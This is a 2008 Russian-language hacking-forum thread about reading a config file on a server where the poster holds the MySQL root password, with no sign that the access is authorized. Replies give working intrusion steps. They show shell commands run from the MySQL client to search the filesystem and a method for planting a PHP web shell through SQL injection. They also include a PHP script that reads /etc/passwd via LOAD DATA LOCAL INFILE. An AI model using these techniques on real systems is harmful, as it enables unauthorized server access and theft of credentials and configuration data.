ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.07.2008, 22:04
|
|
Новичок
Регистрация: 30.06.2008
Сообщений: 4
Провел на форуме:
2624
Репутация:
0
|
|
на МуСКуЛ у меня есть пароль рута.
и я проверил, file_priv включён.
т.е. теоретически прочитать файл можно.
вопрос, есть ли средства его найти, если я знаю его название, но не знаю где конкретно установлена та программа, к которой он?
собственно, файл который нужен - это конфиг от одной программы. возможно, можно посмотреть какой-то реестр установленных программ? или в линях такого не предусмотрено?
|
|
|
02.07.2008, 00:33
|
|
Постоянный
Регистрация: 30.12.2006
Сообщений: 434
Провел на форуме:
849583
Репутация:
210
|
|
тебе стоит перенести тему в раздел - уязвимости...
я думаю там точно найдут решение
|
|
|
|
02.07.2008, 01:02
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
залей шелл ...
|
|
|
|
02.07.2008, 02:02
|
|
Участник форума
Регистрация: 04.05.2006
Сообщений: 161
Провел на форуме:
389768
Репутация:
158
|
|
Сообщение от Doom123
залей шелл ...
Через что он на него зайдет? ^^
Какая версия MySQL?
|
|
|
|
02.07.2008, 02:26
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
сервер не без сайтом .. особено сервер с мускл
|
|
|
|
02.07.2008, 02:44
|
|
Постоянный
Регистрация: 30.12.2006
Сообщений: 434
Провел на форуме:
849583
Репутация:
210
|
|
сервер не без сайтом .. особено сервер с мускл
Блин прочти что вообще спрашивается в этой теме 
1 топик
|
|
|
|
02.07.2008, 08:35
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
можно попробовать открыть базу locate, и узнать путь до нужного файла, где ее искать в гугле написано было.
Если юзер, от имени которого запущен мускуль, не входит в группу slocate, а по дефолту это так, то даже если базу отыщет, он ее не прочитает
Код:
# ls -l /var/lib/slocate
-rw-r----- 1 root slocate 3844677 Июн 17 14:11 slocate.db
можно запустить мускульный клиент из консоли (со своей тачки)
Код:
$ mysql -hserver -uroot -ppassword
и попробовать ввести команду
Код:
mysql> \! find / -name '*filename*' -type f -print
Тем самым при удачном стечении обстоятельств найдешь файл, который нужен. А зная полный путь до него и имея права рута на мускуле, прочитать его не составить труда (если прав хватит, конечно) любым из имеющихся способом
Последний раз редактировалось krypt3r; 02.07.2008 в 08:38..
|
|
|
|
03.07.2008, 09:19
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
хм... а что мешает залить шелл через SQL-inj на первую машину, а с нее уже лезть на вторую, точнее пытаться лезть, ведь порты закрыты только извне (из интернет), а изнутри (с локалки) не может быть чтобы абсолютно все порты были закрыты, кроме мускульного..
просто апдейтишь таблицу из которой первый сайт берет например новости и вставляешь в базу произвольный пхп код, потом с первого сайта вызываешь запрос к базе, в нужную колонку в нужную таблицу и в файл заливается шелл, а там уже смотришь по обстоятельствам и узнаешь где конкретно лежит твой файл, и если прав хватит то просматриваешь его
Последний раз редактировалось gisTy; 03.07.2008 в 09:21..
|
|
|
|
03.07.2008, 09:57
|
|
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
Провел на форуме:
515368
Репутация:
135
|
|
Вот простенький скрипт:
PHP код:
<?php
file_get_contents('/etc/passwd');
$l = mysql_connect("localhost", "root");
mysql_query("CREATE DATABASE a");
mysql_query("CREATE TABLE a.a (a varchar(1024))");
mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'");
mysql_close($l); mysql_connect("localhost", "aaaa");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$result = mysql_query("SELECT a FROM a.a");
while(list($row) = mysql_fetch_row($result))
print $row . chr(10);
?>
|
|
|
|
03.07.2008, 21:44
|
|
Новичок
Регистрация: 30.06.2008
Сообщений: 4
Провел на форуме:
2624
Репутация:
0
|
|
Шелл не помог, с первой машины (сайт) на вторую (база) есть доступ только на базу.
Локатор - не смог разобраться 
Походу бесполезняк...
...а последний приведённый скрипт, он, простите, к чему?
php там вертится на одной машине, загрузить оттуда etc/passwwd невозможно потому что там WinXP и такого файла просто нет. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
